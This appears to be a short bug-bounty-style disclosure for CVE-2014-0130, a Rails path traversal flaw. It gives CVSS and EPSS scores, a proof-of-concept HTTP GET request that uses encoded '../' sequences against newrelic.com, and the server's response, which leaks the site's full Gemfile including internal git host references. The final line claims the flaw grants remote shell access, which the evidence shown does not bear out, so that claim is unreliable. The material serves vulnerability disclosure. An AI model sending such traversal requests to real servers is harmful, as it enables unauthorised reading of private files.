4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
0.003 Low
EPSS
Percentile
67.6%
details:
https://github.com/omarkurt/cve-2014-0130
POC:
GET /devops/%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fGemfile HTTP/1.1
Cookie:
Host: newrelic.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Response:
source βhttps://rubygems.orgβ source βhttps://[email protected]/newrelic/β gem βrailsβ, β3.2.18β gem βhamlβ gem βnewrelic_rpmβ, β3.9.5.251β gem βignore_whitehat_transactionsβ gem βjquery-railsβ, β2.3.0β gem βjquery-ui-railsβ gem βfancybox-railsβ gem βmasonry-railsβ #gem βpartner-apiβ, :git => β[email protected]:newrelic/partner_api.gitβ, :branch => βv1.1.0β gem βcurbβ, β~> 0.8.4β gem βunicornβ gem βmysql2β, β~> 0.3.11β gem βpapersβ gem βhttpartyβ gem βinsights_eventβ, β~> 2.0.0β gem βdalliβ gem βsavonβ, β~>0.9.1β gem βactiveadminβ, β0.6.0β gem βrack-ssl-enforcerβ gem βrack-attackβ, β~> 4.3.0β gem βdynamic_sitemapsβ, β1.0.8β gem βactive_admin_importableβ gem βrdiscountβ gem βutf8-cleanerβ gem βrack-corsβ, require: βrack/corsβ gem βtzinfoβ, β0.3.37β gem βprismic.ioβ, β~> 1.3.0β, require: βprismicβ gem βrack-rewriteβ gem βguard_corgiβ, β~> 2.0.1β gem βfaradayβ gem βuuidβ gem βanalytics-rubyβ, β~> 2.0.0β, require: βsegment/analyticsβ gem βgoogle_driveβ gem βstatus_infoβ, β~> 0.1.5β group :deployment do gem βcenturionβ end group :development, :test, :www_test do gem βci_reporterβ, β~> 1.8.4β gem βselenium-webdriverβ, β~>2.29β gem βrspecβ, β~>2.12.0β gem βrspec-coreβ, β~>2.12.0β gem βrspec-expectationsβ, β~>2.12.0β gem βrspec-mocksβ, β~>2.12.0β gem βrspec-railsβ, β~>2.12.0β gem βsimplecovβ gem βcapybaraβ gem βmochaβ, :require => βmocha/apiβ # the require gets rid of the annoying mocha deprecation notices gem βshouldaβ end group :test do gem βvcrβ gem βwebmockβ gem βsauceβ gem βsauce-connectβ gem βparallel_testsβ end group :development, :local_development do #gem βdebuggerβ gem βpryβ gem βpry-navβ gem βguardβ, β~> 1.8.0β gem βguard-rspecβ gem βguard-testβ gem βguard-sporkβ gem βgrowlβ gem βrb-fseventβ #, :require => false if RUBY_PLATFORM =~ /darwin/i gem βspork-railsβ gem βbetter_errorsβ, β~> 0.8.0β gem βbinding_of_callerβ # this makes better_errors even better gem βruby-profβ end group :gooddata_sync, :local_gooddata_sync do gem βdropbox-sdkβ gem βrubyzipβ end # Gems used only for assets and not required # in production environments by default. group :assets do gem βsass-railsβ, β~> 3.2.6β gem βcompass-railsβ, β~> 1.1.6β gem βcoffee-railsβ, β~> 3.2.1β gem βexecjsβ gem βturbo-sprockets-rails3β # See https://github.com/sstephenson/execjs#readme for more supported runtimes gem βlibv8β, β~> 3.16.14.3β gem βtherubyracerβ, β~> 0.12.0β, :platforms => :ruby gem βuglifierβ, β>= 1.0.3β gem βbourbonβ gem βneatβ end
It can cause a remote access to the server shell.